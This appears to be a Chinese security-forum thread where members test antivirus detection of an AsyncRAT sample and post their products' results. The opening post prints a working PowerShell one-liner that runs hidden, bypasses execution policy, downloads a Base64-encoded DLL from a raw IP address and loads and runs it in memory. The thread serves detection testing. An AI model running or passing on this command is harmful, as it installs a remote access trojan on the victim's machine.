#AsyncRAT

swizzer

1. powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/CRYPS/F3dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('war/se347jkGsUONhMT0BGQj91/p/gro.eitsap//:ptth'))"

复制代码

得到的文件经过Base64 解码后:






解码后得到的总觉得是个损坏的dll···[/s[

aboringman

执行

1. 文件名: ISB.Downloader!gen285
   
2. 完整路径: 不可用
   
3. 
   
4. ____________________________
   
5. 
   
6. ____________________________
   
7. 
   
8. 
   
9. 在电脑上
   
10. 不可用
    
11. 
    
12. 上次使用时间
    
13. 2022/2/10 ( 2:15:24 )
    
14. 
    
15. 启动项
    
16. 否
    
17. 
    
18. 已启动
    
19. 否
    
20. 
    
21. 威胁类型: 启发式病毒。 根据恶意软件启发式技术检测威胁。
    
22. 
    
23. ____________________________
    
24. 
    
25. 
    
26. ISB.Downloader!gen285
    
27. 定位
    
28. 
    
29. 
    
30. 未知
    
31. Norton 社区中使用了此文件的用户数未知 。
    
32. 
    
33. 未知
    
34. 此文件版本当前 未知。
    
35. 
    
36. 高
    
37. 此文件具有高风险。
    
38. 
    
39. 
    
40. ____________________________
    
41. 
    
42. 
    
43. 来源: 外部介质
    
44. 
    
45. 
    
46. ____________________________
    
47. 
    
48. 文件操作
    
49. 
    
50. 文件: powershell.exe (ISB.Downloader!gen285) 未尝试修复
    
51. ____________________________
    
52. 
    
53. 
    
54. 文件指纹 - SHA:
    
55. 不可用
    
56. 文件指纹 - MD5:
    
57. 不可用
    

复制代码

McAfee：网络保护出手拦截下载。

ft-cai

Kaspersky


昨天的库就杀了

病毒样本收集者

MDE扫描miss

火绒的粉丝

火绒：miss

心心相印

fs miss

846472713

G DATA

ANY.LNK

MS Defender：目前暂时都没有报告。@swizzer 你不会直接把解码后的内容粘贴到一个文本文档里了吧，那样是不行的呀

ft-cai

小A

swizzer

ANY.LNK 发表于 2022-2-11 08:34
MS Defender：目前暂时都没有报告。@swizzer 你不会直接把解码后的内容粘贴到一个文本文档里了吧，那样是不 ...

确实是···因为我不知道怎么把它修复成正常的PE文件

所以这里主要测试的是那个Powershell命令